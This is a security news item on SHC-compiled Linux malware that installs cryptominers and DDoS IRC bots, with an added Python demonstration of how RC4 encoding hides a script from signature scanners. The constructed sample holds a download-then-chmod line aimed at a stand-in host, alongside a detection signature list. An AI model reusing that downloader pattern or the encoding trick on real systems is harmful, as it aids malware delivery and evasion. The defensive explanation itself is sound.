Security News > 2023 > January > New SHC-compiled Linux malware installs cryptominers, DDoS bots
A new Linux malware downloader created using SHC has been spotted in the wild, infecting systems with Monero cryptocurrency miners and DDoS IRC bots.
According to ASEC researchers, who discovered the attack, the SHC loader was uploaded to VirusTotal by Korean users, with attacks generally focused on Linux systems in the same country.
The analysts say the attacks likely rely on brute-forcing weak administrator account credentials over SSH on Linux servers.
Because scripts in SHC ELF executables are encoded using the RC4 algorithm, the malicious commands are not as easily seen by security software, potentially allowing the malware to evade detection.
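The effect of that encoding on a static scanner can be shown with a short added example (not code from ASEC, from SHC, or from the original article). It uses textbook RC4 rather than SHC's exact routine, and the script, key and signature list are constructed for illustration: plain string signatures stop matching once the script is encoded, while byte entropy still marks the blob as worth a closer look.

```python
import math
from collections import Counter

def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA); the same call encodes and decodes."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # keystream generation + XOR
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)

def signature_hits(blob: bytes, signatures) -> list:
    """Naive static scan: which byte signatures occur in the blob?"""
    return [sig for sig in signatures if sig in blob]

def entropy(blob: bytes) -> float:
    """Shannon entropy in bits per byte (8.0 means uniformly random)."""
    n = len(blob)
    return -sum(c / n * math.log2(c / n) for c in Counter(blob).values())

# Constructed sample: a harmless stand-in for an embedded shell script.
LINE = b"curl -s http://example.invalid/s%d -o /tmp/s%d && chmod +x /tmp/s%d\n"
SCRIPT = b"#!/bin/bash\n" + b"".join(LINE % (i, i, i) for i in range(12))
KEY = b"constructed-demo-key"        # assumption: not a key from any real sample
SIGNATURES = [b"curl ", b"chmod +x", b"/tmp/"]
ENCODED = rc4(KEY, SCRIPT)           # what a static scanner would see on disk

if __name__ == "__main__":
    views = (("plain", SCRIPT), ("encoded", ENCODED),
             ("decoded", rc4(KEY, ENCODED)))
    for label, blob in views:
        hits = signature_hits(blob, SIGNATURES)
        print(f"{label:8} hits={hits} entropy={entropy(blob):.2f}")
```

High entropy alone also describes compressed or packed data, so it is a triage signal to combine with behavioural evidence such as the process activity seen when the file runs.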
When the SHC malware downloader is executed, it will fetch multiple other malware payloads and install them on the device.
The second payload retrieved, dropped, and loaded by the SHC malware downloader is a Perl-based DDoS IRC bot.